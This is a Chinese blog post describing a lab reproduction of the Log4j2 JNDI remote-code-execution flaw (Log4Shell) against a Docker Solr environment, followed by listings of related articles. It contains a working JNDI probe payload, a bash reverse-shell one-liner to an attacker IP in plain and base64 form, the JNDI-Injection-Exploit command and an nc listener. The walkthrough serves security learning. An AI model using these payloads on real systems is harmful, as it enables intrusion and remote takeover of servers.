log4j2漏洞模拟

于 2025-03-17 17:36:20 发布
阅读量402 收藏 3
点赞数 5
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146286133
版权

log4j2是Apache的一个java日志框架,这个远程代码执行漏洞是由JNDI引起,JNDI其中有一个look up()方法,它可以远程加载对象,如果我们在我们的服务器上构造一个恶意对象让他来加载,它加载了恶意对象之后我们就可以控制它

1、搭建环境

在云服务器上搭建这个网站,下图是步骤

其中vim编辑的是以下内容,把版本改为了3

然后docker-compose up -d运行得到

2、验证这个网站存不存在log4j2漏洞

打开DNSlog.cn

获取一个域名

然后去传参数

/我们的solr/admin/cores?action=${jndi:ldap://${sys:java.version}.00xyqc.dnslog.cn}

回车后,刷新我们的dnslog

收到了回显,说明我们的java.version执行了,能执行就说明漏洞存在

3、开始攻击

(1)在本地构造恶意类

下面就是一个构造恶意类文件

(2)进入上面的文件所在的目录

(3)反弹shell

将bash -i >& /dev/tcp/150.158.199.164/6666 0>&1进行base64编码,IP是我们服务器的IP,端口也是我们开启的端口

(4)执行命令,生成恶意的类

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5OS4xNjQvNjY2NiAwPiYx|{base64,-d}|{bash,-i}" -A "150.158.199.164"

如果出现了java不存在的情况,则执行apt install java版本

(5)开启一个新窗口用来监听端口

nc -lvvp 6666

如果没有nc的话就需要下载一个

yum install nc

(6)让网站加载我们恶意的类

(7)回到另一个窗口观察nc已经监听到了

Log4j2 漏洞检测工具清单
01-17 1万+
距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年...
Log4j2漏洞(一)原理和dnslog验证
02-06 2341
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4J2漏洞修复方法验证及最终方案
dbzzcz的博客
12-14 2万+
验证代码准备: 在项目登录接口中增加类似如下代码: @PostMapping("login") public R<?> login(@RequestBody LoginBody form) { //form.getUsername()="${java:version}" logger.info("登录:{}",form.getUsername()); // 用户登录 LoginUser userInfo = sysLoginService.login(form.getUsernam
安全漏洞(1)-Log4j2远程代码执行漏洞log4j2漏洞验证
迷途的小兵
12-13 1万+
Log4j2远程代码执行漏洞log4j2漏洞验证
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 3万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
Apache Log4j2漏洞复现
最新发布
qq_62056583的博客
07-20 952
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞
Apache Log4j2模拟漏洞复现及解决方案
qrainly的博客
12-13 3896
上周五有关开源日志框架Log4j2高危漏洞预警发出后,这几天各大互联网公司都在加班加点做紧急漏洞处理。这是个什么漏洞呢?有多大危害,搞得互联网任人心惶惶!
log4j远程注入漏洞模拟和详解
zchlove137的博客
12-21 4581
IT之家 12 月 10 日消息,近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。IT之家获悉,由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊.
log4j日志漏洞问题
feinifi的博客
11-16 4209
log4j远程漏洞复现以及对这个漏洞问题的看法。
Log4J2漏洞(CVE-2024-44228)原理_log4j2漏洞原理,2024年最新快手网络安全面试
2401_83621004的博客
04-15 947
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 1010
log4j2漏洞复现 (CVE-2021-44228)
漏洞复现——log4j2-rce(CVE-2021-44228)
小林说安全的博客
05-29 2111
漏洞复现——log4j2-rce(CVE-2021-44228)
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
【网络安全---漏洞复现】log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 3813
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Struts2框架下Log4j2漏洞检测方法分析与总结!!!
logic1001的博客
03-07 933
Log4j2漏洞出现有大半年的时间了,这个核弹级别的漏洞危害很大,但是这个漏洞检测起来却很麻烦,因为黑盒测试无法预判网站哪个应用功能在后台调用了log4j2记录日志功能。目前通用的做法就是使用burpsuite插件进行被动扫描,原理就是把所有与用户交互参数都用各种log4j2检测payload测试一遍,然后观察DNSlog中有没有访问记录。这个漏洞检测方法和SQL注入、XSS漏洞有点像,常规方法很难完全发现漏洞,有时候就连研发人员自己也搞不清楚哪些应用功能点调用了log4j2
记一次log4j2(CVE-2021-44228)漏洞复现
qq_42562304的博客
09-01 489
Apache Log4j是Apache的一个开源项目,是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。可以控制日志信息输送的目的地为控制台、文件、GUI组件等, 通过定义每一条日志信息的级别, 能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。Log4j2中存在JNDI注入漏洞, 当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
log4j2漏洞分析
weixin_47623655的博客
04-11 1417
漏洞标识符为CVE-2021-44228,通常称为Log4Shell或Log4j漏洞,它存在于Log4j的JNDI查找功能中。攻击者可以通过特殊构造的请求利用此漏洞,向Log4j发送恶意请求,从而触发远程代码执行(RCE)漏洞,进而获得服务器上的完全控制权限。这个漏洞的危害非常大,由于Log4j广泛应用于各种Java应用程序中,这意味着攻击者可以利用该漏洞轻松攻击大量的目标。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值